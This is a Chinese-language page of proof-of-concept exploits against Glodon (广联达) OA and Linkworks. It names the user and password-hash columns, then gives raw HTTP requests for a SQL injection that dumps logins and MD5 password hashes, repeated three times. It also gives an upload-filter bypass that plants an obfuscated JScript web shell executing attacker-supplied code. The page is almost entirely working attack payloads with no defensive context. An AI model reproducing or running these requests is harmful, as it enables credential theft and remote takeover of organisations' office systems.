广联达

目录

• 广联达oa用户表
• 广联达oa sql注入漏洞 POC
• 广联达oa 后台文件上传漏洞 POC
• 广联达oa sql注入漏洞 POC
• 广联达 Linkworks GetIMDictionarySQL 注入漏洞

广联达oa用户表

T_ORG_USER → F_CODE ，F_PWD_MD5

广联达oa sql注入漏洞 POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1

Host: [xxx.com](http://xxx.com)

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36

Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: [http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx](http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx)

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie:

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 88

dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

广联达oa 后台文件上传漏洞 POC

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1

Host: 10.10.10.1:8888

X-Requested-With: Ext.basex

Accept: text/html, application/xhtml+xml, image/jxr, */*

Accept-Language: zh-Hans-CN,zh-Hans;q=0.5

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj

Accept: */*

Origin: http://10.10.10.1

Referer: 

Cookie:

Connection: close

Content-Length: 421

------WebKitFormBoundaryFfJZ4PlAZBixjELj

Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"

Content-Type: application/text

<%@ Page Language="Jscript" Debug=true%>

<%

var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';

var GFMA=Request.Form("qmq1");

var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);

eval(GFMA, ONOQ);

%>

------WebKitFormBoundaryFfJZ4PlAZBixjELj--

广联达oa sql注入漏洞 POC

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1

Host: [xxx.com](http://xxx.com)

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36

Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: [http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx](http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx)

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie:

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 88

dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --

广联达 Linkworks GetIMDictionarySQL 注入漏洞

POC:
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --